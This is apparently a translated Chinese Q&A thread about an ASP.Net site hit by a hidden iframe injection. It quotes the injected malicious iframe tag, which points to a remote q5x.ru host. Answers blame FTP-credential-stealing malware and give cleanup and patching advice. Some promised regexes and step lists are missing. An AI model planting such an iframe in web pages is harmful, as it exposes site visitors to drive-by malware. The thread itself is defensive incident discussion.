我的一个网站最近感染了某种涉及注入隐藏 iframe 的攻击,它的来源来自一个网站 q5x.ru(请勿链接)。
谷歌搜索并没有帮助我弄清楚这次攻击是如何发生的,所以我想知道你们中是否有人遇到过同样的问题?
iframe 代码是这样的:
<iframe src="http://q5x.ru:8080/index.php" width=109 height=175 style="visibility: hidden"></iframe>
根据要求,我正在运行一个带有数据库的 ASP.Net 网站,就表单而言,显然是用于回发的 ASP.Net 表单。
我们最近在我们客户的一个网站上遇到了同样的问题。
此问题很可能是由主要针对 FTP 客户端并搜索主机名/用户名/密码组合的病毒感染引起的。找到后,将打开与 FTP 服务器的连接,并搜索 index.* 文件并将 iFrame 添加到其中。
在我们的特殊情况下,我们的客户端是少数可以直接访问 FTP 服务器的客户端之一。我们立即更改了密码,恢复了文件的备份并删除了我们客户的 FTP 访问权限。
您应该采取的步骤:
另请注意,如果Google 爬虫在受感染时访问您的网站,它会将您添加到恶意软件列表中,这将严重影响您网站的声誉。如果发生这种情况,请采取以下步骤:
以下是一些可能对您有所帮助的提示:
如何清理受感染的文件?
使用这些正则表达式搜索包含恶意代码的所有页面并将其替换为空格:
您可能必须编写一个脚本来为服务器中的所有文件自动执行此操作。
资料来源: http ://www.diovo.com/2009/03/hidden-iframe-injection-attacks/
https://stackoverflow.com/questions/990437/iframe-script-attack-to-website
这以前发生在我身上。您需要手动搜索有问题的注入脚本并将其删除。我建议您更改密码并更改数据库和数据库表的名称,以确保
尽管@Aron写道,可能某些客户端病毒已经捕获了您的密码(对于这种特定的攻击,这很可能是正确的),但这些攻击通常会利用服务器软件中未修补的漏洞。就像在 Web 服务器本身、CMS 或phpMyAdmin等工具中一样。
那么:您确定您的服务器上运行的是所有软件的最新版本吗?
(或者 FTP 日志确实显示了一些活动?)